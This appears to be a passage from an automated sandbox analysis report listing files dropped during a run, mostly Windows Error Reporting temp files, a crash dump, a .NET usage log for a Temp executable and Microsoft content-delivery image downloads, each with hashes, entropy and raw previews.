                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.8.9.7.6.5.6.5.4.7.3.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.8.9.7.8.3.6.0.7.8.1.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.7.2.5.e.b.b.-.a.d.a.d.-.4.c.1.2.-.8.e.4.7.-.7.f.2.6.2.e.0.6.e.c.9.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.2.4.f.8.0.4.-.4.b.6.c.-.4.d.d.b.-.a.a.d.3.-.b.0.f.b.0.1.9.d.6.8.0.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.5.B.B.C...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.c.c.-.0.0.0.1.-.0.0.1.6.-.9.d.5.2.-.a.d.4.6.b.d.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.1.a.b.d.2.2.a.2.e.e.a.9.2.b.8.a.7.f.d.5.0.e.2.3.1.4.5.a.3.2.7.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.5.B.B.C...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F4.tmp.txt
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 13340
Entropy (8bit): 2.69625050451798
Encrypted: false
SSDEEP: 96:9GiZYWdtNxdSYAYHWOwPHcUYEZ3zt0iHFaoowSpmdJaOKGMvlIVlW1C3:9jZDcXLdySJaOKGMv6V81C3
MD5: 72F230E559D353F527212903830DCBB6
SHA1: A46C90A7E6FF357384B1ADDC560178F5453B2CD8
SHA-256: 47F8457ED2B41853D2EFCEC7FB02DE8E0C19F5F89FE17CB67FD151109DE185E4
SHA-512: 68501EFCBDBD6560DCC2868A088413BD3FAF7E692102EEDF5814416AEB942499813CD202D3284CD2867B98CAFF40F3EE4CA97CA2C7EAA0D1314178514A0F6DC1
Malicious: false
Reputation: unknown
                                                                                                                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD849.tmp.dmp
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Sat Jan 15 03:09:27 2022, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):36668
                                                                                                                        Entropy (8bit):2.117103937458852
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:5ZqT4MxcyQbNOeh0c9kk8JzTpYL4Sjtu30PIG3Z8IF:oQ0e83tiLx4EPLF
                                                                                                                        MD5:496E92D721F8E10B39B44D0F4CA6D89D
                                                                                                                        SHA1:AE388E1DC8882F735980D0460D10BFFC69AF9B79
                                                                                                                        SHA-256:91FC0F6EA2F1BCBF168B57787F820DB2F41B77E3D0469B364F413E72E8937C7B
                                                                                                                        SHA-512:0BD89C72EC7066EE6AD1F53AD6B2873E3616A5D5A520E3FB812AA332D301FBE47B5076CBE517C0BADF23F35F7960830D421CCA5F8578E20CFBB820DE84B3177F
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MDMP....... ........:.a........................................z%..........T.......8...........T................z..........H...........4....................................................................U...........B..............GenuineIntelW...........T............:.a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERE171.tmp.WERInternalMetadata.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8390
                                                                                                                        Entropy (8bit):3.7011350482745184
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Rrl7r3GLNi6md6d6YIWSULgmfPRSDxCpDx89bdZsf1Dfm:RrlsNi56d6Y5SULgmfPRSzdyf1C
                                                                                                                        MD5:968F3AF271FD4CE28C40F73590BCA036
                                                                                                                        SHA1:77A499C5AD4A009DD85C5689FECEAD99CDF9DB95
                                                                                                                        SHA-256:D989F0538F980FD768B617972D05FAE1B361E1F8C4EB4E4212F8DB71A7CF9B73
                                                                                                                        SHA-512:385783DD10F08CF73203617B20A4964195E3323221474291499DCCAA2960488D27052FBD175516181A884C732C0DC6B92E4CEF49B8587082863C4C4E0F17DFB6
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.0.4.<./.P.i.d.>.......
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERE6F1.tmp.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4685
                                                                                                                        Entropy (8bit):4.478780568175464
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwSD8zsmJgtWI9h9WSC8BC8fm8M4Jd8qFx+q8vI89gERhdd:uITf8WMSN5JTKTgERhdd
                                                                                                                        MD5:5A603AD54A5E06BACD7B138A39BE046E
                                                                                                                        SHA1:58B7254947CAEF8F8808B08E9B8CB31618D7C9B0
                                                                                                                        SHA-256:7DF81C368A2989544FC6977AE0242FEA067BA507BAD0F659106E2E0ECA6CA2E3
                                                                                                                        SHA-512:09CC48B52225DC6267B4F73756C56C0EDDBD217532B2752F4F8D739D0366641C5ACF3CEC03CA3054B0B94C2283130687B3F4CD48463DCD25EFC8EEC9065EEEED
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342820" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF935.tmp.csv
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):55166
                                                                                                                        Entropy (8bit):3.063403298010223
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:MbHydL/jw6tEEQlhbZilVfBl8xfddAc8Vk:MbHydL/jw6tEEQlhbZilVfBmxfddAc8a
                                                                                                                        MD5:588FF1C6A720F668343C3545EC86C5EE
                                                                                                                        SHA1:DB8FFA83F59917EE1955379382ABD5C177ECEF25
                                                                                                                        SHA-256:AB38D23F75AFDF2F6913F4E07F668C7CA4C4BC2CF5FC620802DD956E4D5D71A5
                                                                                                                        SHA-512:C0C9AC910856431A969793280DAD81C9D0A80C42F8D32AFA48DCDAD8800513A27731807DD0E7332EF3830AA3F64D3238D4C15932BC3B3BE2CE743C4AC42F6C96
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8058.exe.log
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\8058.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):700
                                                                                                                        Entropy (8bit):5.346524082657112
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                        MD5:65CF801545098D915A06D8318D296A01
                                                                                                                        SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                        SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                        SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\0fcf02de-4ec7-4c4a-9f75-b190c4b2731b.c7c3e4c9-bbf8-40be-800f-a09c9aae178d.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1218
                                                                                                                        Entropy (8bit):3.589442580791056
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRipcTpWzgx71+8zsafc+Oc2CpXpPkX+vUViiBg5X3gebiL:LLD2mRiS6gvNzrfeIXpPkX+v8iiBg5Xq
                                                                                                                        MD5:ED6375356DBE3105FB3C6C285BB7BB61
                                                                                                                        SHA1:5B44C771F10C06AB6630EA9415D22B0ABF5072D9
                                                                                                                        SHA-256:B910022E06D2F1FEB8D961628DBA6EF12A63A492182EEBEE6C33077E6035BD0B
                                                                                                                        SHA-512:6525445A1750C62123EC52C830F22F93D79ABA02468C9A5E07ED49AE829EC4A1F1AE3B228DB239B867279134BF5C6FE3C97A3E44B2B64C3AFC62969D774D0391
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.j.Z.?.v.e.r.=.e.e.7.1...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.h.u.,. .1.3. .J.a.n. .2.0.2.2. .1.1.:.5.7.:.3.3. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .e.d.f.f.1.b.c.b.-.c.f.5.5.-.4.8.c.8.-.8.7.e.6.-.a.d.0.4.2.6.9.c.4.b.e.9...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.p.n.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.j.Z.?.v.e.r.=.e.e.7.1...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.5.5.2.0...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.5.5.2.0...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.l.i.c.,. .
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\0fcf02de-4ec7-4c4a-9f75-b190c4b2731b.down_data
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):15520
                                                                                                                        Entropy (8bit):1.896672757405903
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:x/6mM+k29W8sEvN4e4rxN+Y9rN+p4BCZxw/A/GQBC1GbGLxxVs4Psc5vH7CSpNvn:xS6kEWRvxNXrNQZqR+0Xsc5jhpNV4O
                                                                                                                        MD5:E3016B6D693EF6EB1BA9DA3078AE4730
                                                                                                                        SHA1:5AD0C746BD7B0DF41EBE31A8884A77E1208E6B01
                                                                                                                        SHA-256:D55321AE7A013B00941E36D12160D6596D616EBD68D2240866275C170BB822F9
                                                                                                                        SHA-512:737858FCB07EC6FED1014B9F58248AF81E3F21ED69CCF528365D77438F3284FCE6B2E3DBBD2EBBC318224F4E0C466453B558D3BD56359E66D4418C14DEA51A02
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: .PNG........IHDR..............w=.....pHYs...............:.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2017 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2017-05-17T14:41:35-07:00</xmp:CreateDate>. <xmp:ModifyDate>2017-05-17T14:43:52-07:00</xmp:ModifyDate>. <xmp:M
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\21013e79-9794-49b7-ae5b-fc5c992bd6bc.a214058d-4932-49cc-ab40-d730f65403f6.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.605918884002608
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiw0oUWzgx71++Bisafc+Oc2CpXpjjX+vUViwzB+vFX3+vqbbL0D:LLD2mRiabgvJirfeIXpjjX+v8iqBCX3S
                                                                                                                        MD5:195D829E09800C81AE13EBEF1D5FCB05
                                                                                                                        SHA1:DDBC8B89C88BA51ABCB9C3E91E08EE956C2E40B8
                                                                                                                        SHA-256:AF908F5DE5D73626FEF4AEACE77887D9025A763E2B99B3AEBF05F56CDF5304C7
                                                                                                                        SHA-512:5C62BB28712F1BCA6AF00515DBB3BEB0081F52987C03F622CCC44595C30A5CE8BC935A398D0C2DFA8A9694F4C55BC5E07818CB1F9581EC020DC4BDD3357B3433
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.V.B.5.?.v.e.r.=.d.d.3.a...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.u.e.,. .1.1. .J.a.n. .2.0.2.2. .2.0.:.5.2.:.0.7. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .7.6.2.f.8.9.7.1.-.d.6.d.b.-.4.c.6.4.-.8.0.6.5.-.9.d.4.f.0.2.b.9.8.6.7.b...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.V.B.5.?.v.e.r.=.d.d.3.a...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .7.5.5.4.3.1...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .7.5.5.4.3.1...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\21013e79-9794-49b7-ae5b-fc5c992bd6bc.up_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):278
                                                                                                                        Entropy (8bit):3.40206142697723
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRmRL3:ZxMghwLtHSM1Sb9mSMXAvwRml
                                                                                                                        MD5:AEFA3D8CE597A555C0D1CC74126F7FA3
                                                                                                                        SHA1:BE33A552E7BDC93A5749190A28EC843C9E6ED768
                                                                                                                        SHA-256:6FD155BD2B31AFFEF15C8CE887B50ECBC912C0DD9C4113E2B76B6CDECCD0F6DA
                                                                                                                        SHA-512:A9594A9589B147F8451E3241B2497E195DA9F582FB264BF0BF9E84B3CFD7BB6934F97507891744D78114B197757485C7147F6AFF21F25E07F25D986AA59D3B09
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.V.B.5.?.v.e.r.=.d.d.3.a...........
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\27cc05ce-f6ae-4e8c-aa08-af3f678f3684.7e4aef61-82dc-4c05-85c3-81f1b0303abe.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.5787279232030773
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiwQfO1Wzgx71+f+fYMYsafc+Oc2CpXpjjX+vUViwQjBWX3BbN+zP6D:LLD2mRiHWOgvELbrfeIXpjjX+v8iHjBq
                                                                                                                        MD5:8267193EA712F064D8D137F0ED94624D
                                                                                                                        SHA1:44176BFD36C7E0E23106020D1E266C3ECDDD74DF
                                                                                                                        SHA-256:589148B40E1EFEF193CA4EB5F35D1DC591FCB22898346A7CA8655A3E70633FCB
                                                                                                                        SHA-512:7BBF2908CDEC58D9A8EE1949CBC3636F7B8C69E30EFBDF27B2D434BCEDC6F6C2E894D6B69C2E62A1D4957B776D6658D68EDE88D7979A30FC8438D71E999F91E5
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.Y.e.S.?.v.e.r.=.0.9.d.6...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .F.r.i.,. .1.4. .J.a.n. .2.0.2.2. .1.3.:.0.9.:.4.7. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .0.8.1.5.2.c.d.8.-.c.d.a.3.-.4.1.0.e.-.8.e.7.c.-.d.a.c.2.c.1.6.a.0.c.8.8...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.Y.e.S.?.v.e.r.=.0.9.d.6...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .6.4.9.4.2.8...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .6.4.9.4.2.8...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\27cc05ce-f6ae-4e8c-aa08-af3f678f3684.down_data
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1080x1920, frames 3
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):649428
